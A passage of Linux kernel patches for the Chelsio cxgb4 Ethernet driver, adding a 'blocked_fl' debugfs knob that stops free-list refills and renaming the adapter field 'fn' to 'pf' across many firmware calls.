debugging purpose. Signed-off-by: Hariprasad Shenai Signed-off-by: David S. Miller --- drivers/net/ethernet/chelsio/cxgb4/cxgb4.h | 1 + .../ethernet/chelsio/cxgb4/cxgb4_debugfs.c | 56 +++++++++++++++++++ .../net/ethernet/chelsio/cxgb4/cxgb4_main.c | 20 ++++++- drivers/net/ethernet/chelsio/cxgb4/sge.c | 5 ++ 4 files changed, 81 insertions(+), 1 deletion(-) diff --git a/drivers/net/ethernet/chelsio/cxgb4/cxgb4.h b/drivers/net/ethernet/chelsio/cxgb4/cxgb4.h index 3c109d115365..63c30f325929 100644 --- a/drivers/net/ethernet/chelsio/cxgb4/cxgb4.h +++ b/drivers/net/ethernet/chelsio/cxgb4/cxgb4.h @@ -650,6 +650,7 @@ struct sge { struct sge_rspq **ingr_map; /* qid->queue ingress queue map */ unsigned long *starving_fl; unsigned long *txq_maperr; + unsigned long *blocked_fl; struct timer_list rx_timer; /* refills starving FLs */ struct timer_list tx_timer; /* checks Tx queues */ }; diff --git a/drivers/net/ethernet/chelsio/cxgb4/cxgb4_debugfs.c b/drivers/net/ethernet/chelsio/cxgb4/cxgb4_debugfs.c index 371f75e782e5..3fa363232283 100644 --- a/drivers/net/ethernet/chelsio/cxgb4/cxgb4_debugfs.c +++ b/drivers/net/ethernet/chelsio/cxgb4/cxgb4_debugfs.c @@ -1959,6 +1959,61 @@ static void add_debugfs_mem(struct adapter *adap, const char *name, size_mb << 20); } +static int blocked_fl_open(struct inode *inode, struct file *file) +{ + file->private_data = inode->i_private; + return 0; +} + +static ssize_t blocked_fl_read(struct file *filp, char __user *ubuf, + size_t count, loff_t *ppos) +{ + int len; + const struct adapter *adap = filp->private_data; + char *buf; + ssize_t size = (adap->sge.egr_sz + 3) / 4 + + adap->sge.egr_sz / 32 + 2; /* includes ,/\n/\0 */ + + buf = kzalloc(size, GFP_KERNEL); + if (!buf) + return -ENOMEM; + + len = snprintf(buf, size - 1, "%*pb\n", + adap->sge.egr_sz, adap->sge.blocked_fl); + len += sprintf(buf + len, "\n"); + size = simple_read_from_buffer(ubuf, count, ppos, buf, len); + t4_free_mem(buf); + return size; +} + +static ssize_t blocked_fl_write(struct file *filp, const char __user *ubuf, + size_t count, loff_t *ppos) +{ + int err; + unsigned long *t; + struct adapter *adap = filp->private_data; + + t = kcalloc(BITS_TO_LONGS(adap->sge.egr_sz), sizeof(long), GFP_KERNEL); + if (!t) + return -ENOMEM; + + err = bitmap_parse_user(ubuf, count, t, adap->sge.egr_sz); + if (err) + return err; + + bitmap_copy(adap->sge.blocked_fl, t, adap->sge.egr_sz); + t4_free_mem(t); 
+ return count; +} + +static const struct file_operations blocked_fl_fops = { + .owner = THIS_MODULE, + .open = blocked_fl_open, + .read = blocked_fl_read, + .write = blocked_fl_write, + .llseek = generic_file_llseek, +}; + /* Add an array of Debug FS files. */ void add_debugfs_files(struct adapter *adap, @@ -2022,6 +2077,7 @@ int t4_setup_debugfs(struct adapter *adap) #if IS_ENABLED(CONFIG_IPV6) { "clip_tbl", &clip_tbl_debugfs_fops, S_IRUSR, 0 }, #endif + { "blocked_fl", &blocked_fl_fops, S_IRUSR | S_IWUSR, 0 }, }; /* Debug FS nodes common to all T5 and later adapters. diff --git a/drivers/net/ethernet/chelsio/cxgb4/cxgb4_main.c b/drivers/net/ethernet/chelsio/cxgb4/cxgb4_main.c index 73ac153795b6..79ef047ee75c 100644 --- a/drivers/net/ethernet/chelsio/cxgb4/cxgb4_main.c +++ b/drivers/net/ethernet/chelsio/cxgb4/cxgb4_main.c @@ -3844,7 +3844,7 @@ static int adap_init0(struct adapter *adap) } /* Allocate the memory for the vaious egress queue bitmaps - * ie starving_fl and txq_maperr. + * ie starving_fl, txq_maperr and blocked_fl. */ adap->sge.starving_fl = kcalloc(BITS_TO_LONGS(adap->sge.egr_sz), sizeof(long), GFP_KERNEL); @@ -3860,6 +3860,15 @@ static int adap_init0(struct adapter *adap) goto bye; } +#ifdef CONFIG_DEBUG_FS + adap->sge.blocked_fl = kcalloc(BITS_TO_LONGS(adap->sge.egr_sz), + sizeof(long), GFP_KERNEL); + if (!adap->sge.blocked_fl) { + ret = -ENOMEM; + goto bye; + } +#endif + params[0] = FW_PARAM_PFVF(CLIP_START); params[1] = FW_PARAM_PFVF(CLIP_END); ret = t4_query_params(adap, adap->mbox, adap->fn, 0, 2, params, val); @@ -4072,6 +4081,9 @@ static int adap_init0(struct adapter *adap) kfree(adap->sge.ingr_map); kfree(adap->sge.starving_fl); kfree(adap->sge.txq_maperr); +#ifdef CONFIG_DEBUG_FS + kfree(adap->sge.blocked_fl); +#endif if (ret != -ETIMEDOUT && ret != -EIO) t4_fw_bye(adap, adap->mbox); return ret; @@ -4515,6 +4527,9 @@ static void free_some_resources(struct adapter *adapter) kfree(adapter->sge.ingr_map); kfree(adapter->sge.starving_fl); kfree(adapter->sge.txq_maperr); +#ifdef CONFIG_DEBUG_FS + kfree(adapter->sge.blocked_fl); +#endif disable_msi(adapter); for_each_port(adapter, i) @@ -4661,6 +4676,9 @@ static int init_one(struct pci_dev *pdev, const struct pci_device_id *ent) setup_memwin(adapter); err = adap_init0(adapter); +#ifdef CONFIG_DEBUG_FS + bitmap_zero(adapter->sge.blocked_fl, adapter->sge.egr_sz); +#endif setup_memwin_rdma(adapter); if (err) goto out_unmap_bar; diff --git a/drivers/net/ethernet/chelsio/cxgb4/sge.c b/drivers/net/ethernet/chelsio/cxgb4/sge.c index dd18fcb644f9..19886d5506a4 100644 --- a/drivers/net/ethernet/chelsio/cxgb4/sge.c +++ b/drivers/net/ethernet/chelsio/cxgb4/sge.c @@ -588,6 +588,11 @@ static unsigned int refill_fl(struct adapter *adap, struct sge_fl *q, int n, struct rx_sw_desc *sd = &q->sdesc[q->pidx]; int node; +#ifdef CONFIG_DEBUG_FS + if (test_bit(q->cntxt_id - adap->sge.egr_start, adap->sge.blocked_fl)) + goto out; +#endif + gfp |= __GFP_NOWARN; node = dev_to_node(adap->pdev_dev); From b261272276777f0af94fa3da07a64ece9e4626e3 Mon Sep 17 00:00:00 2001 From: Hariprasad Shenai Date: Wed, 27 May 2015 22:30:24 +0530 Subject: [PATCH 321/872] cxgb4/cxgb4vf: function and argument name cleanup This patch changes variable name 'fn' to 'pf' of structure adapter. A 'fn' usually stands for PCI function which could be a PF or a VF. However, the use of this particular variable is explicitly limited to PF only. So, be specific about it in the variable name. 
Also corrects arguments passed for fn t4_ofld_eq_free, t4_ctrl_eq_free, t4_eth_eq_free, t4_iq_free, t4_alloc_vi, t4_fw_hello, t4_wr_mbox and t4_cfg_pfvf function. Also renames cxgb4_t4_bar2_sge_qregs to t4_bar2_sge_qregs and renames the latter function name in cxgb4vf driver to t4vf_bar2_sge_qregs to avoid conflicts. Also fixes alignment for these function. Signed-off-by: Hariprasad Shenai Signed-off-by: David S. Miller --- drivers/net/ethernet/chelsio/cxgb4/cxgb4.h | 4 +- .../ethernet/chelsio/cxgb4/cxgb4_debugfs.c | 2 +- .../ethernet/chelsio/cxgb4/cxgb4_ethtool.c | 16 ++-- .../net/ethernet/chelsio/cxgb4/cxgb4_main.c | 78 +++++++++---------- drivers/net/ethernet/chelsio/cxgb4/sge.c | 30 +++---- drivers/net/ethernet/chelsio/cxgb4/t4_hw.c | 22 +++--- drivers/net/ethernet/chelsio/cxgb4vf/sge.c | 4 +- .../ethernet/chelsio/cxgb4vf/t4vf_common.h | 10 +-- .../net/ethernet/chelsio/cxgb4vf/t4vf_hw.c | 12 +-- 9 files changed, 89 insertions(+), 89 deletions(-) diff --git a/drivers/net/ethernet/chelsio/cxgb4/cxgb4.h b/drivers/net/ethernet/chelsio/cxgb4/cxgb4.h index 63c30f325929..15cca3013de2 100644 --- a/drivers/net/ethernet/chelsio/cxgb4/cxgb4.h +++ b/drivers/net/ethernet/chelsio/cxgb4/cxgb4.h @@ -679,7 +679,7 @@ struct adapter { struct pci_dev *pdev; struct device *pdev_dev; unsigned int mbox; - unsigned int fn; + unsigned int pf; unsigned int flags; enum chip_type chip; @@ -1221,7 +1221,7 @@ int t4_prep_fw(struct adapter *adap, struct fw_info *fw_info, int t4_prep_adapter(struct adapter *adapter); enum t4_bar2_qtype { T4_BAR2_QTYPE_EGRESS, T4_BAR2_QTYPE_INGRESS }; -int cxgb4_t4_bar2_sge_qregs(struct adapter *adapter, +int t4_bar2_sge_qregs(struct adapter *adapter, unsigned int qid, enum t4_bar2_qtype qtype, u64 *pbar2_qoffset, diff --git a/drivers/net/ethernet/chelsio/cxgb4/cxgb4_debugfs.c b/drivers/net/ethernet/chelsio/cxgb4/cxgb4_debugfs.c index 3fa363232283..7cb423745974 100644 --- a/drivers/net/ethernet/chelsio/cxgb4/cxgb4_debugfs.c +++ b/drivers/net/ethernet/chelsio/cxgb4/cxgb4_debugfs.c @@ -1222,7 +1222,7 @@ static int sensors_show(struct seq_file *seq, void *v) param[1] = (FW_PARAMS_MNEM_V(FW_PARAMS_MNEM_DEV) | FW_PARAMS_PARAM_X_V(FW_PARAMS_PARAM_DEV_DIAG) | FW_PARAMS_PARAM_Y_V(FW_PARAM_DEV_DIAG_VDD)); - ret = t4_query_params(adap, adap->mbox, adap->fn, 0, 2, + ret = t4_query_params(adap, adap->mbox, adap->pf, 0, 2, param, val); if (ret < 0 || val[0] == 0) diff --git a/drivers/net/ethernet/chelsio/cxgb4/cxgb4_ethtool.c b/drivers/net/ethernet/chelsio/cxgb4/cxgb4_ethtool.c index 401272a2691e..13d5101a0d9f 100644 --- a/drivers/net/ethernet/chelsio/cxgb4/cxgb4_ethtool.c +++ b/drivers/net/ethernet/chelsio/cxgb4/cxgb4_ethtool.c @@ -250,7 +250,7 @@ static int restart_autoneg(struct net_device *dev) return -EAGAIN; if (p->link_cfg.autoneg != AUTONEG_ENABLE) return -EINVAL; - t4_restart_aneg(p->adapter, p->adapter->fn, p->tx_chan); + t4_restart_aneg(p->adapter, p->adapter->pf, p->tx_chan); return 0; } @@ -267,7 +267,7 @@ static int identify_port(struct net_device *dev, else return -EINVAL; - return t4_identify_port(adap, adap->fn, netdev2pinfo(dev)->viid, val); + return t4_identify_port(adap, adap->pf, netdev2pinfo(dev)->viid, val); } static unsigned int from_fw_linkcaps(enum fw_port_type type, unsigned int caps) @@ -439,7 +439,7 @@ static int set_settings(struct net_device *dev, struct ethtool_cmd *cmd) lc->autoneg = cmd->autoneg; if (netif_running(dev)) - return t4_link_start(p->adapter, p->adapter->fn, p->tx_chan, + return t4_link_start(p->adapter, p->adapter->pf, p->tx_chan, lc); return 0; } @@ 
-472,7 +472,7 @@ static int set_pauseparam(struct net_device *dev, if (epause->tx_pause) lc->requested_fc |= PAUSE_TX; if (netif_running(dev)) - return t4_link_start(p->adapter, p->adapter->fn, p->tx_chan, + return t4_link_start(p->adapter, p->adapter->pf, p->tx_chan, lc); return 0; } @@ -617,7 +617,7 @@ static int eeprom_ptov(unsigned int phys_addr, unsigned int fn, unsigned int sz) */ static int eeprom_rd_phys(struct adapter *adap, unsigned int phys_addr, u32 *v) { - int vaddr = eeprom_ptov(phys_addr, adap->fn, EEPROMPFSIZE); + int vaddr = eeprom_ptov(phys_addr, adap->pf, EEPROMPFSIZE); if (vaddr >= 0) vaddr = pci_read_vpd(adap->pdev, vaddr, sizeof(u32), v); @@ -626,7 +626,7 @@ static int eeprom_rd_phys(struct adapter *adap, unsigned int phys_addr, u32 *v) static int eeprom_wr_phys(struct adapter *adap, unsigned int phys_addr, u32 v) { - int vaddr = eeprom_ptov(phys_addr, adap->fn, EEPROMPFSIZE); + int vaddr = eeprom_ptov(phys_addr, adap->pf, EEPROMPFSIZE); if (vaddr >= 0) vaddr = pci_write_vpd(adap->pdev, vaddr, sizeof(u32), &v); @@ -669,8 +669,8 @@ static int set_eeprom(struct net_device *dev, struct ethtool_eeprom *eeprom, aligned_offset = eeprom->offset & ~3; aligned_len = (eeprom->len + (eeprom->offset & 3) + 3) & ~3; - if (adapter->fn > 0) { - u32 start = 1024 + adapter->fn * EEPROMPFSIZE; + if (adapter->pf > 0) { + u32 start = 1024 + adapter->pf * EEPROMPFSIZE; if (aligned_offset < start || aligned_offset + aligned_len > start + EEPROMPFSIZE) diff --git a/drivers/net/ethernet/chelsio/cxgb4/cxgb4_main.c b/drivers/net/ethernet/chelsio/cxgb4/cxgb4_main.c index 79ef047ee75c..4f69b5237129 100644 --- a/drivers/net/ethernet/chelsio/cxgb4/cxgb4_main.c +++ b/drivers/net/ethernet/chelsio/cxgb4/cxgb4_main.c @@ -322,7 +322,7 @@ static void dcb_tx_queue_prio_enable(struct net_device *dev, int enable) * level") we need to issue the Set Parameters Commannd * without sleeping (timeout < 0). */ - err = t4_set_params_timeout(adap, adap->mbox, adap->fn, 0, 1, + err = t4_set_params_timeout(adap, adap->mbox, adap->pf, 0, 1, &name, &value, -FW_CMD_MAX_TIMEOUT); @@ -387,7 +387,7 @@ static int set_addr_filters(const struct net_device *dev, bool sleep) int uc_cnt = netdev_uc_count(dev); int mc_cnt = netdev_mc_count(dev); const struct port_info *pi = netdev_priv(dev); - unsigned int mb = pi->adapter->fn; + unsigned int mb = pi->adapter->pf; /* first do the secondary unicast addresses */ netdev_for_each_uc_addr(ha, dev) { @@ -444,7 +444,7 @@ static int set_rxmode(struct net_device *dev, int mtu, bool sleep_ok) ret = set_addr_filters(dev, sleep_ok); if (ret == 0) - ret = t4_set_rxmode(pi->adapter, pi->adapter->fn, pi->viid, mtu, + ret = t4_set_rxmode(pi->adapter, pi->adapter->pf, pi->viid, mtu, (dev->flags & IFF_PROMISC) ? 1 : 0, (dev->flags & IFF_ALLMULTI) ? 
1 : 0, 1, -1, sleep_ok); @@ -461,7 +461,7 @@ static int link_start(struct net_device *dev) { int ret; struct port_info *pi = netdev_priv(dev); - unsigned int mb = pi->adapter->fn; + unsigned int mb = pi->adapter->pf; /* * We do not set address filters and promiscuity here, the stack does @@ -879,7 +879,7 @@ int cxgb4_write_rss(const struct port_info *pi, const u16 *queues) for (i = 0; i < pi->rss_size; i++, queues++) rss[i] = rxq[*queues].rspq.abs_id; - err = t4_config_rss_range(adapter, adapter->fn, pi->viid, 0, + err = t4_config_rss_range(adapter, adapter->pf, pi->viid, 0, pi->rss_size, rss, pi->rss_size); /* If Tunnel All Lookup isn't specified in the global RSS * Configuration, then we need to specify a default Ingress @@ -1416,8 +1416,8 @@ int cxgb4_set_rspq_intr_params(struct sge_rspq *q, FW_PARAMS_PARAM_X_V( FW_PARAMS_PARAM_DMAQ_IQ_INTCNTTHRESH) | FW_PARAMS_PARAM_YZ_V(q->cntxt_id); - err = t4_set_params(adap, adap->fn, adap->fn, 0, 1, &v, - &new_idx); + err = t4_set_params(adap, adap->mbox, adap->pf, 0, 1, + &v, &new_idx); if (err) return err; } @@ -1438,7 +1438,7 @@ static int cxgb_set_features(struct net_device *dev, netdev_features_t features) if (!(changed & NETIF_F_HW_VLAN_CTAG_RX)) return 0; - err = t4_set_rxmode(pi->adapter, pi->adapter->fn, pi->viid, -1, + err = t4_set_rxmode(pi->adapter, pi->adapter->pf, pi->viid, -1, -1, -1, -1, !!(features & NETIF_F_HW_VLAN_CTAG_RX), true); if (unlikely(err)) @@ -2175,7 +2175,7 @@ int cxgb4_bar2_sge_qregs(struct net_device *dev, u64 *pbar2_qoffset, unsigned int *pbar2_qid) { - return cxgb4_t4_bar2_sge_qregs(netdev2adap(dev), + return t4_bar2_sge_qregs(netdev2adap(dev), qid, (qtype == CXGB4_BAR2_QTYPE_EGRESS ? T4_BAR2_QTYPE_EGRESS @@ -2377,7 +2377,7 @@ static void process_db_drop(struct work_struct *work) unsigned int bar2_qid; int ret; - ret = cxgb4_t4_bar2_sge_qregs(adap, qid, T4_BAR2_QTYPE_EGRESS, + ret = t4_bar2_sge_qregs(adap, qid, T4_BAR2_QTYPE_EGRESS, &bar2_qoffset, &bar2_qid); if (ret) dev_err(adap->pdev_dev, "doorbell drop recovery: " @@ -2420,7 +2420,7 @@ static void uld_attach(struct adapter *adap, unsigned int uld) unsigned short i; lli.pdev = adap->pdev; - lli.pf = adap->fn; + lli.pf = adap->pf; lli.l2t = adap->l2t; lli.tids = &adap->tids; lli.ports = adap->port; @@ -2757,7 +2757,7 @@ static int cxgb_close(struct net_device *dev) netif_tx_stop_all_queues(dev); netif_carrier_off(dev); - return t4_enable_vi(adapter, adapter->fn, pi->viid, false, false); + return t4_enable_vi(adapter, adapter->pf, pi->viid, false, false); } /* Return an error number if the indicated filter isn't writable ... 
@@ -2960,7 +2960,7 @@ static int cxgb_ioctl(struct net_device *dev, struct ifreq *req, int cmd) } else return -EINVAL; - mbox = pi->adapter->fn; + mbox = pi->adapter->pf; if (cmd == SIOCGMIIREG) ret = t4_mdio_rd(pi->adapter, mbox, prtad, devad, data->reg_num, &data->val_out); @@ -2987,7 +2987,7 @@ static int cxgb_change_mtu(struct net_device *dev, int new_mtu) if (new_mtu < 81 || new_mtu > MAX_MTU) /* accommodate SACK */ return -EINVAL; - ret = t4_set_rxmode(pi->adapter, pi->adapter->fn, pi->viid, new_mtu, -1, + ret = t4_set_rxmode(pi->adapter, pi->adapter->pf, pi->viid, new_mtu, -1, -1, -1, -1, true); if (!ret) dev->mtu = new_mtu; @@ -3003,7 +3003,7 @@ static int cxgb_set_mac_addr(struct net_device *dev, void *p) if (!is_valid_ether_addr(addr->sa_data)) return -EADDRNOTAVAIL; - ret = t4_change_mac(pi->adapter, pi->adapter->fn, pi->viid, + ret = t4_change_mac(pi->adapter, pi->adapter->pf, pi->viid, pi->xact_addr_filt, addr->sa_data, true, true); if (ret < 0) return ret; @@ -3100,7 +3100,7 @@ static int adap_init1(struct adapter *adap, struct fw_caps_config_cmd *c) c->op_to_write = htonl(FW_CMD_OP_V(FW_CAPS_CONFIG_CMD) | FW_CMD_REQUEST_F | FW_CMD_READ_F); c->cfvalid_to_len16 = htonl(FW_LEN16(*c)); - ret = t4_wr_mbox(adap, adap->fn, c, sizeof(*c), c); + ret = t4_wr_mbox(adap, adap->mbox, c, sizeof(*c), c); if (ret < 0) return ret; @@ -3116,18 +3116,18 @@ static int adap_init1(struct adapter *adap, struct fw_caps_config_cmd *c) } c->op_to_write = htonl(FW_CMD_OP_V(FW_CAPS_CONFIG_CMD) | FW_CMD_REQUEST_F | FW_CMD_WRITE_F); - ret = t4_wr_mbox(adap, adap->fn, c, sizeof(*c), NULL); + ret = t4_wr_mbox(adap, adap->mbox, c, sizeof(*c), NULL); if (ret < 0) return ret; - ret = t4_config_glbl_rss(adap, adap->fn, + ret = t4_config_glbl_rss(adap, adap->pf, FW_RSS_GLB_CONFIG_CMD_MODE_BASICVIRTUAL, FW_RSS_GLB_CONFIG_CMD_TNLMAPEN_F | FW_RSS_GLB_CONFIG_CMD_TNLALLLKP_F); if (ret < 0) return ret; - ret = t4_cfg_pfvf(adap, adap->fn, adap->fn, 0, adap->sge.egr_sz, 64, + ret = t4_cfg_pfvf(adap, adap->mbox, adap->pf, 0, adap->sge.egr_sz, 64, MAX_INGQ, 0, 0, 4, 0xf, 0xf, 16, FW_CMD_CAP_PF, FW_CMD_CAP_PF); if (ret < 0) @@ -3171,7 +3171,7 @@ static int adap_init1(struct adapter *adap, struct fw_caps_config_cmd *c) } /* get basic stuff going */ - return t4_early_init(adap, adap->fn); + return t4_early_init(adap, adap->pf); } /* @@ -3434,7 +3434,7 @@ static int adap_init0_config(struct adapter *adapter, int reset) params[0] = (FW_PARAMS_MNEM_V(FW_PARAMS_MNEM_DEV) | FW_PARAMS_PARAM_X_V(FW_PARAMS_PARAM_DEV_CF)); ret = t4_query_params(adapter, adapter->mbox, - adapter->fn, 0, 1, params, val); + adapter->pf, 0, 1, params, val); if (ret == 0) { /* * For t4_memory_rw() below addresses and @@ -3723,7 +3723,7 @@ static int adap_init0(struct adapter *adap) v = FW_PARAMS_MNEM_V(FW_PARAMS_MNEM_DEV) | FW_PARAMS_PARAM_X_V(FW_PARAMS_PARAM_DEV_PORTVEC); - ret = t4_query_params(adap, adap->mbox, adap->fn, 0, 1, &v, &port_vec); + ret = t4_query_params(adap, adap->mbox, adap->pf, 0, 1, &v, &port_vec); if (ret < 0) goto bye; @@ -3746,7 +3746,7 @@ static int adap_init0(struct adapter *adap) */ params[0] = (FW_PARAMS_MNEM_V(FW_PARAMS_MNEM_DEV) | FW_PARAMS_PARAM_X_V(FW_PARAMS_PARAM_DEV_CF)); - ret = t4_query_params(adap, adap->mbox, adap->fn, 0, 1, + ret = t4_query_params(adap, adap->mbox, adap->pf, 0, 1, params, val); /* If the firmware doesn't support Configuration Files, @@ -3805,7 +3805,7 @@ static int adap_init0(struct adapter *adap) params[3] = FW_PARAM_PFVF(FILTER_START); params[4] = FW_PARAM_PFVF(FILTER_END); params[5] = 
FW_PARAM_PFVF(IQFLINT_START); - ret = t4_query_params(adap, adap->mbox, adap->fn, 0, 6, params, val); + ret = t4_query_params(adap, adap->mbox, adap->pf, 0, 6, params, val); if (ret < 0) goto bye; adap->sge.egr_start = val[0]; @@ -3823,7 +3823,7 @@ static int adap_init0(struct adapter *adap) */ params[0] = FW_PARAM_PFVF(EQ_END); params[1] = FW_PARAM_PFVF(IQFLINT_END); - ret = t4_query_params(adap, adap->mbox, adap->fn, 0, 2, params, val); + ret = t4_query_params(adap, adap->mbox, adap->pf, 0, 2, params, val); if (ret < 0) goto bye; adap->sge.egr_sz = val[0] - adap->sge.egr_start + 1; @@ -3871,7 +3871,7 @@ static int adap_init0(struct adapter *adap) params[0] = FW_PARAM_PFVF(CLIP_START); params[1] = FW_PARAM_PFVF(CLIP_END); - ret = t4_query_params(adap, adap->mbox, adap->fn, 0, 2, params, val); + ret = t4_query_params(adap, adap->mbox, adap->pf, 0, 2, params, val); if (ret < 0) goto bye; adap->clipt_start = val[0]; @@ -3880,7 +3880,7 @@ static int adap_init0(struct adapter *adap) /* query params related to active filter region */ params[0] = FW_PARAM_PFVF(ACTIVE_FILTER_START); params[1] = FW_PARAM_PFVF(ACTIVE_FILTER_END); - ret = t4_query_params(adap, adap->mbox, adap->fn, 0, 2, params, val); + ret = t4_query_params(adap, adap->mbox, adap->pf, 0, 2, params, val); /* If Active filter size is set we enable establishing * offload connection through firmware work request */ @@ -3897,7 +3897,7 @@ static int adap_init0(struct adapter *adap) */ params[0] = FW_PARAM_PFVF(CPLFW4MSG_ENCAP); val[0] = 1; - (void) t4_set_params(adap, adap->mbox, adap->fn, 0, 1, params, val); + (void)t4_set_params(adap, adap->mbox, adap->pf, 0, 1, params, val); /* * Find out whether we're allowed to use the T5+ ULPTX MEMWRITE DSGL @@ -3909,7 +3909,7 @@ static int adap_init0(struct adapter *adap) adap->params.ulptx_memwrite_dsgl = false; } else { params[0] = FW_PARAM_DEV(ULPTX_MEMWRITE_DSGL); - ret = t4_query_params(adap, adap->mbox, adap->fn, 0, + ret = t4_query_params(adap, adap->mbox, adap->pf, 0, 1, params, val); adap->params.ulptx_memwrite_dsgl = (ret == 0 && val[0] != 0); } @@ -3935,7 +3935,7 @@ static int adap_init0(struct adapter *adap) params[3] = FW_PARAM_PFVF(TDDP_START); params[4] = FW_PARAM_PFVF(TDDP_END); params[5] = FW_PARAM_DEV(FLOWC_BUFFIFO_SZ); - ret = t4_query_params(adap, adap->mbox, adap->fn, 0, 6, + ret = t4_query_params(adap, adap->mbox, adap->pf, 0, 6, params, val); if (ret < 0) goto bye; @@ -3973,7 +3973,7 @@ static int adap_init0(struct adapter *adap) params[3] = FW_PARAM_PFVF(RQ_END); params[4] = FW_PARAM_PFVF(PBL_START); params[5] = FW_PARAM_PFVF(PBL_END); - ret = t4_query_params(adap, adap->mbox, adap->fn, 0, 6, + ret = t4_query_params(adap, adap->mbox, adap->pf, 0, 6, params, val); if (ret < 0) goto bye; @@ -3990,7 +3990,7 @@ static int adap_init0(struct adapter *adap) params[3] = FW_PARAM_PFVF(CQ_END); params[4] = FW_PARAM_PFVF(OCQ_START); params[5] = FW_PARAM_PFVF(OCQ_END); - ret = t4_query_params(adap, adap->mbox, adap->fn, 0, 6, params, + ret = t4_query_params(adap, adap->mbox, adap->pf, 0, 6, params, val); if (ret < 0) goto bye; @@ -4003,7 +4003,7 @@ static int adap_init0(struct adapter *adap) params[0] = FW_PARAM_DEV(MAXORDIRD_QP); params[1] = FW_PARAM_DEV(MAXIRD_ADAPTER); - ret = t4_query_params(adap, adap->mbox, adap->fn, 0, 2, params, + ret = t4_query_params(adap, adap->mbox, adap->pf, 0, 2, params, val); if (ret < 0) { adap->params.max_ordird_qp = 8; @@ -4021,7 +4021,7 @@ static int adap_init0(struct adapter *adap) if (caps_cmd.iscsicaps) { params[0] = FW_PARAM_PFVF(ISCSI_START); 
params[1] = FW_PARAM_PFVF(ISCSI_END); - ret = t4_query_params(adap, adap->mbox, adap->fn, 0, 2, + ret = t4_query_params(adap, adap->mbox, adap->pf, 0, 2, params, val); if (ret < 0) goto bye; @@ -4151,7 +4151,7 @@ static pci_ers_result_t eeh_slot_reset(struct pci_dev *pdev) if (t4_wait_dev_ready(adap->regs) < 0) return PCI_ERS_RESULT_DISCONNECT; - if (t4_fw_hello(adap, adap->fn, adap->fn, MASTER_MUST, NULL) < 0) + if (t4_fw_hello(adap, adap->mbox, adap->pf, MASTER_MUST, NULL) < 0) return PCI_ERS_RESULT_DISCONNECT; adap->flags |= FW_OK; if (adap_init1(adap, &c)) @@ -4160,7 +4160,7 @@ static pci_ers_result_t eeh_slot_reset(struct pci_dev *pdev) for_each_port(adap, i) { struct port_info *p = adap2pinfo(adap, i); - ret = t4_alloc_vi(adap, adap->fn, p->tx_chan, adap->fn, 0, 1, + ret = t4_alloc_vi(adap, adap->mbox, p->tx_chan, adap->pf, 0, 1, NULL, NULL); if (ret < 0) return PCI_ERS_RESULT_DISCONNECT; @@ -4538,7 +4538,7 @@ static void free_some_resources(struct adapter *adapter) free_netdev(adapter->port[i]); } if (adapter->flags & FW_OK) - t4_fw_bye(adapter, adapter->fn); + t4_fw_bye(adapter, adapter->pf); } #define TSO_FLAGS (NETIF_F_TSO | NETIF_F_TSO6 | NETIF_F_TSO_ECN) @@ -4629,7 +4629,7 @@ static int init_one(struct pci_dev *pdev, const struct pci_device_id *ent) adapter->pdev = pdev; adapter->pdev_dev = &pdev->dev; adapter->mbox = func; - adapter->fn = func; + adapter->pf = func; adapter->msg_enable = dflt_msg_enable; memset(adapter->chan_map, 0xff, sizeof(adapter->chan_map)); @@ -4649,7 +4649,7 @@ static int init_one(struct pci_dev *pdev, const struct pci_device_id *ent) if (!is_t4(adapter->params.chip)) { s_qpp = (QUEUESPERPAGEPF0_S + (QUEUESPERPAGEPF1_S - QUEUESPERPAGEPF0_S) * - adapter->fn); + adapter->pf); qpp = 1 << QUEUESPERPAGEPF0_G(t4_read_reg(adapter, SGE_EGRESS_QUEUES_PER_PAGE_PF_A) >> s_qpp); num_seg = PAGE_SIZE / SEGMENT_SIZE; diff --git a/drivers/net/ethernet/chelsio/cxgb4/sge.c b/drivers/net/ethernet/chelsio/cxgb4/sge.c index 19886d5506a4..f9c889e14634 100644 --- a/drivers/net/ethernet/chelsio/cxgb4/sge.c +++ b/drivers/net/ethernet/chelsio/cxgb4/sge.c @@ -1265,7 +1265,7 @@ out_free: dev_kfree_skb_any(skb); cpl->ctrl0 = htonl(TXPKT_OPCODE_V(CPL_TX_PKT_XT) | TXPKT_INTF_V(pi->tx_chan) | - TXPKT_PF_V(adap->fn)); + TXPKT_PF_V(adap->pf)); cpl->pack = htons(0); cpl->len = htons(skb->len); cpl->ctrl1 = cpu_to_be64(cntrl); @@ -2390,7 +2390,7 @@ static void __iomem *bar2_address(struct adapter *adapter, u64 bar2_qoffset; int ret; - ret = cxgb4_t4_bar2_sge_qregs(adapter, qid, qtype, + ret = t4_bar2_sge_qregs(adapter, qid, qtype, &bar2_qoffset, pbar2_qid); if (ret) return NULL; @@ -2421,7 +2421,7 @@ int t4_sge_alloc_rxq(struct adapter *adap, struct sge_rspq *iq, bool fwevtq, memset(&c, 0, sizeof(c)); c.op_to_vfn = htonl(FW_CMD_OP_V(FW_IQ_CMD) | FW_CMD_REQUEST_F | FW_CMD_WRITE_F | FW_CMD_EXEC_F | - FW_IQ_CMD_PFN_V(adap->fn) | FW_IQ_CMD_VFN_V(0)); + FW_IQ_CMD_PFN_V(adap->pf) | FW_IQ_CMD_VFN_V(0)); c.alloc_to_len16 = htonl(FW_IQ_CMD_ALLOC_F | FW_IQ_CMD_IQSTART_F | FW_LEN16(c)); c.type_to_iqandstindex = htonl(FW_IQ_CMD_TYPE_V(FW_IQ_TYPE_FL_INT_CAP) | @@ -2473,7 +2473,7 @@ int t4_sge_alloc_rxq(struct adapter *adap, struct sge_rspq *iq, bool fwevtq, c.fl0addr = cpu_to_be64(fl->addr); } - ret = t4_wr_mbox(adap, adap->fn, &c, sizeof(c), &c); + ret = t4_wr_mbox(adap, adap->mbox, &c, sizeof(c), &c); if (ret) goto err; @@ -2541,7 +2541,7 @@ int t4_sge_alloc_rxq(struct adapter *adap, struct sge_rspq *iq, bool fwevtq, CONMCTXT_CNGCHMAP_V(1 << (i << 2)); } } - ret = t4_set_params(adap, adap->mbox, 
